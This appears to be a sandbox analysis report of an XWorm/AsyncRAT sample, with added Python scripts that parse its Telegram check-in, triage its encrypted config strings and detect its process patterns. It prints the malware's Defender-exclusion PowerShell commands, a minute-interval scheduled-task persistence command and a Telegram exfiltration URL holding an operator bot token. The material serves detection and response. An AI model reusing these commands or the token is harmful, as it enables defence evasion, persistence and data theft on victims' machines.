Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49710 version: TLS 1.2
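The Telegram check-in above is the most useful artifact in this capture for a responder: the URL path carries the bot token, the query carries the chat_id, and the message body carries the victim identifier, user name and OS string the RAT reports. The parser below is an added example, not code from the Joe Sandbox report: it takes a constructed copy of the captured GET (the path and query are as reported; the CRLF framing and the Host header layout are assumed), pulls out the operator and victim fields, and derives a hunt pattern for proxy or EDR URL logs that matches any Bot API call made with that token, not only sendMessage.

```python
"""Added example, not part of the Joe Sandbox report: parse the XWorm Telegram check-in and
extract the operator identifiers (bot token, chat_id) and the reported victim fields."""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed copy of the captured request; only the CRLF framing is assumed.
BEACON_REQUEST = (
    "GET /bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672"
    "&text=%E2%98%A0%20%5BXWorm%20V3.1%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AB98DB222DCA51DFE7851"
    "%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1\r\n"
    "Host: api.telegram.org\r\nConnection: Keep-Alive\r\n\r\n"
)

# Bot API tokens are "<numeric bot id>:<secret>" and travel in the URL path.
TOKEN_RE = re.compile(r"^/bot(\d+:[A-Za-z0-9_-]{30,})/(\w+)$")
FIELD_RE = re.compile(r"^([A-Za-z][A-Za-z ]*?)\s*:\s*(.*)$")


def _parse_fields(text):
    """Split the RAT's 'Key : value' report; a value may sit on the following line (the victim id does)."""
    fields, pending = {}, None
    for line in text.replace("\r\n", "\n").split("\n"):
        line = line.strip()
        if not line:
            continue
        m = FIELD_RE.match(line)
        if m:
            key, value = m.groups()
            if value:
                fields[key] = value
            else:
                pending = key          # value continues on the next non-empty line
        elif pending:
            fields[pending], pending = line, None
        else:
            fields.setdefault("banner", line)  # the "☠ [XWorm V3.1]" header line
    return fields


def parse_telegram_beacon(raw):
    """Return operator and victim fields from a raw HTTP request to the Telegram Bot API."""
    request_line, _, headers = raw.partition("\r\n")
    _, target, _ = request_line.split(" ", 2)
    host = next((v.strip() for n, _, v in (h.partition(":") for h in headers.split("\r\n"))
                 if n.strip().lower() == "host"), None)
    parts = urlsplit(target)
    m = TOKEN_RE.match(parts.path)
    if not m:
        raise ValueError("not a Telegram Bot API request: %r" % parts.path)
    token, api_method = m.groups()
    query = parse_qs(parts.query)
    fields = _parse_fields(query.get("text", [""])[0])
    banner = re.search(r"\[([^\]]+)\]", fields.get("banner", ""))
    return {
        "host": host,
        "api_method": api_method,
        "bot_id": token.split(":", 1)[0],
        "bot_token": token,
        "chat_id": query.get("chat_id", [None])[0],
        "family_banner": banner.group(1) if banner else None,
        "victim_id": fields.get("New Clinet"),  # the RAT's own misspelling of "Client"
        "username": fields.get("UserName"),
        "os": fields.get("OSFullName"),
    }


def proxy_hunt_pattern(beacon):
    """Regex for proxy/EDR URL fields: any Bot API call with this token, whatever the method or chat."""
    return r"api\.telegram\.org/bot" + re.escape(beacon["bot_token"]) + r"/\w+"


if __name__ == "__main__":
    beacon = parse_telegram_beacon(BEACON_REQUEST)
    for key, value in beacon.items():
        print(f"{key:14} {value}")
    print(proxy_hunt_pattern(beacon))
```

The token is the operator's credential for the Bot API, so it authenticates every call, not just the check-in; the token and chat_id are the values worth sharing with Telegram's abuse contact and adding to proxy block lists, and the hunt pattern catches later calls (for example further sendMessage reports from other victims routed through the same egress) that a match on the literal check-in URL would miss.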

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: X1.exe, XLogger.cs | .Net Code: KeyboardLayout
Source: X1.exe.0.dr, XLogger.cs | .Net Code: KeyboardLayout
Source: C:\Users\user\Desktop\X1.exe | Window created: window name: CLIPBRDWNDCLASS (OLE clipboard window; the process uses the clipboard APIs, consistent with the wallet addresses recovered by the string decryptor)

                            Operating System Destruction

Source: C:\Users\user\Desktop\X1.exe | Process information set: 01 00 00 00 (ProcessBreakOnTermination = 1: the process is marked critical, so terminating it bugchecks the system; this is the "Protects its processes via BreakOnTermination flag" signature, and setting it needs SeDebugPrivilege, cf. "Enables debug privileges". Clear the flag before killing the process during response.)

                            System Summary

                            Source: X1.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0.0.X1.exe.c50000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 00000000.00000000.2025401364.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\X1.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Users\user\Desktop\X1.exeCode function: 0_2_00007FF848F1FECD0_2_00007FF848F1FECD
                            Source: C:\Users\user\Desktop\X1.exeCode function: 0_2_00007FF848F112E90_2_00007FF848F112E9
                            Source: C:\Users\user\Desktop\X1.exeCode function: 0_2_00007FF848F191290_2_00007FF848F19129
                            Source: C:\Users\user\Desktop\X1.exeCode function: 0_2_00007FF848F121D10_2_00007FF848F121D1
                            Source: C:\Users\user\Desktop\X1.exeCode function: 0_2_00007FF848F16CB20_2_00007FF848F16CB2
                            Source: C:\Users\user\Desktop\X1.exeCode function: 0_2_00007FF848F15F060_2_00007FF848F15F06
                            Source: C:\Users\user\Desktop\X1.exeCode function: 0_2_00007FF848F15A090_2_00007FF848F15A09
                            Source: C:\Users\user\Desktop\X1.exeCode function: 0_2_00007FF848F1953A0_2_00007FF848F1953A
                            Source: C:\Users\user\Desktop\X1.exeCode function: 0_2_00007FF848F1A1BB0_2_00007FF848F1A1BB
                            Source: C:\Users\user\AppData\Roaming\X1.exeCode function: 13_2_00007FF848F412E913_2_00007FF848F412E9
                            Source: C:\Users\user\AppData\Roaming\X1.exeCode function: 14_2_00007FF848F0158714_2_00007FF848F01587
                            Source: C:\Users\user\AppData\Roaming\X1.exeCode function: 15_2_00007FF848F312E915_2_00007FF848F312E9
Source: X1.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: X1.exe, type: SAMPLE | Matched rule: MALWARE_Win_AsyncRAT (author = ditekSHen, description = Detects AsyncRAT)
Source: 0.0.X1.exe.c50000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT (author = ditekSHen, description = Detects AsyncRAT)
Source: 00000000.00000000.2025401364.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT (author = ditekSHen, description = Detects AsyncRAT)
Source: C:\Users\user\AppData\Roaming\X1.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT (author = ditekSHen, description = Detects AsyncRAT)
Source: X1.exe, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: X1.exe, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: X1.exe, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: X1.exe.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: X1.exe.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: X1.exe.0.dr, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: X1.exe, Settings.cs | Base64 encoded strings: 'o5Jn5yH3X3IW9rBZIc1QrapCzGC9Pnb5ogILY0md+607/gs7gZMVIIkkheUqNUXM', 'qytL3sbXX+WCCfzYhXTgM0OeGWr0h9LLUn/PRLUwcd2iZCI2TQ33DJcqJ7Ii79RH', 'ze8K7NgV85FNCj/gaOBbf+dBYU+WrSwD+D5fKSncjmmUF8+s1Yj4Iu80vlw0NDro'
Source: X1.exe.0.dr, Settings.cs | Base64 encoded strings: 'o5Jn5yH3X3IW9rBZIc1QrapCzGC9Pnb5ogILY0md+607/gs7gZMVIIkkheUqNUXM', 'qytL3sbXX+WCCfzYhXTgM0OeGWr0h9LLUn/PRLUwcd2iZCI2TQ33DJcqJ7Ii79RH', 'ze8K7NgV85FNCj/gaOBbf+dBYU+WrSwD+D5fKSncjmmUF8+s1Yj4Iu80vlw0NDro'
Source: X1.exe, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: X1.exe, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: X1.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: X1.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@16/17@2/3
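The three Base64 strings the report pulls out of Settings.cs sit next to an AlgorithmAES.cs class calling TransformFinalBlock, which suggests they are encrypted configuration rather than encoded plaintext. The report does not give the key, so nothing is decrypted here; the following triage script is an added example (not part of the report or the sample) that only characterises the decoded blobs: their length, whether they are aligned to the 16-byte AES block size, whether they are printable text, and their byte entropy. The strings are copied from the report; the text-likeness and entropy heuristics are the author's own and their thresholds are assumptions.

```python
"""Triage of the Base64 strings the report lists from Settings.cs.
Added example: decodes and characterises the blobs, decrypts nothing."""
import base64
import math

# Copied from the report's Settings.cs findings. What they decrypt to is not
# known here and is not guessed.
SETTINGS_STRINGS = [
    "o5Jn5yH3X3IW9rBZIc1QrapCzGC9Pnb5ogILY0md+607/gs7gZMVIIkkheUqNUXM",
    "qytL3sbXX+WCCfzYhXTgM0OeGWr0h9LLUn/PRLUwcd2iZCI2TQ33DJcqJ7Ii79RH",
    "ze8K7NgV85FNCj/gaOBbf+dBYU+WrSwD+D5fKSncjmmUF8+s1Yj4Iu80vlw0NDro",
]

AES_BLOCK = 16  # block size of the cipher AlgorithmAES.cs is named after


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte (heuristic: roughly 4 for English text, well
    above 5 for a few dozen bytes of cipher output)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def looks_like_text(data: bytes) -> bool:
    """True when every byte is printable ASCII or common whitespace, i.e. the
    Base64 wrapper hid plaintext (a host name, a port) rather than ciphertext."""
    return all(0x20 <= b < 0x7F or b in (0x09, 0x0A, 0x0D) for b in data)


def characterise(b64: str) -> dict:
    """Decode one Settings.cs string and report the properties that separate
    Base64-wrapped ciphertext from Base64-wrapped configuration text."""
    raw = base64.b64decode(b64, validate=True)
    return {
        "length": len(raw),
        "block_aligned": len(raw) % AES_BLOCK == 0,
        "blocks": len(raw) // AES_BLOCK,
        "is_text": looks_like_text(raw),
        "entropy": round(shannon_entropy(raw), 2),
    }


def triage(strings):
    """Characterise every string; the caller decides whether a key hunt is needed."""
    return [characterise(s) for s in strings]


if __name__ == "__main__":
    for s, r in zip(SETTINGS_STRINGS, triage(SETTINGS_STRINGS)):
        print(s[:16] + "...", r)
```

All three strings decode to 48 bytes, exactly three AES blocks, and none of them is printable text, which is what padded block-cipher output looks like and what an encoded host/port/key triple would not. The next step for an analyst is recovering the key material that AlgorithmAES.cs derives, which the report does not show and this script does not attempt.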
Source: C:\Users\user\Desktop\X1.exe | File created: C:\Users\user\AppData\Roaming\X1.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4296:120:WilError_03
Source: C:\Users\user\AppData\Roaming\X1.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\X1.exe | Mutant created: \Sessions\1\BaseNamedObjects\wR68bAqsujrl6VoA
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5016:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4220:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_03
Source: C:\Users\user\Desktop\X1.exe | File created: C:\Users\user\AppData\Local\Temp\Log.tmp
Source: X1.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: X1.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\X1.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\X1.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: X1.exe | ReversingLabs: Detection: 78%
Source: X1.exe | Virustotal: Detection: 71%
Source: C:\Users\user\Desktop\X1.exe | File read: C:\Users\user\Desktop\X1.exe
Source: unknown | Process created: C:\Users\user\Desktop\X1.exe "C:\Users\user\Desktop\X1.exe"
Source: C:\Users\user\Desktop\X1.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\X1.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'X1.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\X1.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\X1.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\X1.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "X1" /tr "C:\Users\user\AppData\Roaming\X1.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\X1.exe "C:\Users\user\AppData\Roaming\X1.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\X1.exe "C:\Users\user\AppData\Roaming\X1.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\X1.exe C:\Users\user\AppData\Roaming\X1.exe
Source: C:\Users\user\Desktop\X1.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X1.exe'
Source: C:\Users\user\Desktop\X1.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'X1.exe'
Source: C:\Users\user\Desktop\X1.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\X1.exe'
Source: C:\Users\user\Desktop\X1.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "X1" /tr "C:\Users\user\AppData\Roaming\X1.exe"
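The process tree above is the part of this report a detection engineer can act on directly: a binary in the user's profile spawns PowerShell with `-ExecutionPolicy Bypass` to add Defender path and process exclusions for itself and its dropped copy, then registers a scheduled task that re-launches the dropped copy every minute at the highest run level. The script below is an added example (not report output and not the sample's code) that scores process-creation events for exactly those two patterns. It assumes a simplified event shape with `parent`, `image` and `cmd` fields, as one would extract from Sysmon Event ID 1; the three malicious command lines are copied from the report, while the parent/child pairing, the two benign control events and the score weights and threshold are assumptions made for the example.

```python
"""Score process-creation events for the Defender-exclusion and scheduled-task
pattern seen in the process tree above (added example, not report output)."""
import re

# Constructed sample events. The first three command lines are copied from the
# report's process tree; the parent/child pairing and the two benign control
# events are assumptions made for this example.
SAMPLE_EVENTS = [
    {"parent": r"C:\Users\user\Desktop\X1.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
             r"-ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "
             r"'C:\Users\user\Desktop\X1.exe'")},
    {"parent": r"C:\Users\user\Desktop\X1.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
             r"-ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'X1.exe'")},
    {"parent": r"C:\Users\user\Desktop\X1.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": (r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute '
             r'/mo 1 /tn "X1" /tr "C:\Users\user\AppData\Roaming\X1.exe"')},
    # benign control (constructed): an administrator excluding a build directory
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe Add-MpPreference -ExclusionPath "D:\Builds"'},
    # benign control (constructed): a daily task pointing at a system binary
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'schtasks.exe /create /tn "Maint" /sc daily /tr "C:\Windows\System32\cleanmgr.exe"'},
]

# Paths a standard user can write to; a parent or target here raises the score.
USER_WRITABLE = re.compile(r"\\(users|programdata|temp)\\", re.I)
EXCLUSION_CMDLET = re.compile(r"add-mppreference\s+.*-exclusion(path|process|extension)", re.I)
EXCLUSION_TARGET = re.compile(r"""-exclusion\w+\s+['"]?([^'"]+)""", re.I)
TASK_ACTION = re.compile(r'/tr\s+"?([^"]+)', re.I)


def detect_defender_exclusion(ev):
    """Add-MpPreference -Exclusion* launched through PowerShell (the logic behind
    a 'Defender exclusion added' rule), scored by how unattended it looks."""
    if not ev["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return None
    m = EXCLUSION_CMDLET.search(ev["cmd"])
    if not m:
        return None
    score, reasons = 1, [f"Add-MpPreference -Exclusion{m.group(1)}"]
    if re.search(r"-executionpolicy\s+bypass", ev["cmd"], re.I):
        score += 1
        reasons.append("execution policy bypassed on the command line")
    if USER_WRITABLE.search(ev["parent"]):
        score += 2
        reasons.append("parent process runs from a user-writable path")
    t = EXCLUSION_TARGET.search(ev["cmd"])
    if t and USER_WRITABLE.search(t.group(1)):
        score += 1
        reasons.append("excluded path is user-writable")
    return {"rule": "defender_exclusion_added", "score": score, "reasons": reasons}


def detect_schtasks_persistence(ev):
    """schtasks /create with a very short interval, highest run level and an
    action under the user profile: the minute-interval loop in the report."""
    if not ev["image"].lower().endswith("schtasks.exe"):
        return None
    cmd = ev["cmd"]
    if not re.search(r"/create\b", cmd, re.I):
        return None
    score, reasons = 1, ["schtasks /create"]
    mo = re.search(r"/mo\s+(\d+)", cmd, re.I)
    if re.search(r"/sc\s+minute\b", cmd, re.I) and mo and int(mo.group(1)) <= 5:
        score += 2
        reasons.append(f"re-launched every {mo.group(1)} minute(s)")
    if re.search(r"/rl\s+highest\b", cmd, re.I):
        score += 1
        reasons.append("run level HIGHEST")
    t = TASK_ACTION.search(cmd)
    if t and USER_WRITABLE.search(t.group(1)):
        score += 2
        reasons.append("task action lives in a user-writable path")
    if USER_WRITABLE.search(ev["parent"]):
        score += 1
        reasons.append("registered by a process in a user-writable path")
    return {"rule": "schtasks_minute_persistence", "score": score, "reasons": reasons}


RULES = (detect_defender_exclusion, detect_schtasks_persistence)


def run(events, threshold=3):
    """Apply every rule to every event and keep findings at or above threshold."""
    findings = []
    for idx, ev in enumerate(events):
        for rule in RULES:
            f = rule(ev)
            if f and f["score"] >= threshold:
                f["event"] = idx
                findings.append(f)
    return findings


if __name__ == "__main__":
    for f in run(SAMPLE_EVENTS):
        print(f"event {f['event']}: {f['rule']} score={f['score']}: " + "; ".join(f["reasons"]))
```

The two benign controls still match the bare cmdlet and the bare `/create`, which is why each rule scores rather than fires on the keyword alone: the signal in this report is the combination of a user-profile parent, a bypassed execution policy, a self-referential exclusion and a one-minute task with `/RL HIGHEST`. Note that the `-ExclusionPath` and `-ExclusionProcess` variants are both caught, and that `/RL HIGHEST` only takes effect if the registering process is already elevated, so a hit on that flag from a non-elevated parent is worth checking against the process token rather than trusting the command line.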
Source: C:\Users\user\Desktop\X1.exe | Sections loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, sspicli.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wbemcomn.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, sxs.dll, mpr.dll, scrrun.dll, linkinfo.dll, ntshrui.dll, cscapi.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, secur32.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, avicap32.dll, msvfw32.dll, winmm.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, msasn1.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe | Sections loaded: kernel.appcore.dll, taskschd.dll, sspicli.dll, xmllite.dll
Source: C:\Users\user\AppData\Roaming\X1.exe | Sections loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, sspicli.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll
Source: C:\Users\user\AppData\Roaming\X1.exe | Sections loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, sspicli.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\X1.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\X1.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                            Source: X1.lnk.0.dr | LNK file: ..\..\..\..\..\X1.exe
                            Source: Window Recorder | Window detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                            Source: X1.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: X1.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Data Obfuscation

                            Source: X1.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: X1.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: X1.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: X1.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: X1.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: X1.exe.0.dr, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: X1.exe, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
                            Source: X1.exe, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
                            Source: X1.exe, Messages.cs | .Net Code: Memory
                            Source: X1.exe.0.dr, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
                            Source: X1.exe.0.dr, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
                            Source: X1.exe.0.dr, Messages.cs | .Net Code: Memory
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848E0D2A5 pushad ; iretd 2_2_00007FF848E0D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848F2B9FA push E85A8DD7h; ret 2_2_00007FF848F2BAF9
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FF848E0D2A5 pushad ; iretd 5_2_00007FF848E0D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FF848DFD2A5 pushad ; iretd 8_2_00007FF848DFD2A6
                            Source: C:\Users\user\Desktop\X1.exe | File created: C:\Users\user\AppData\Roaming\X1.exe

                            Boot Survival

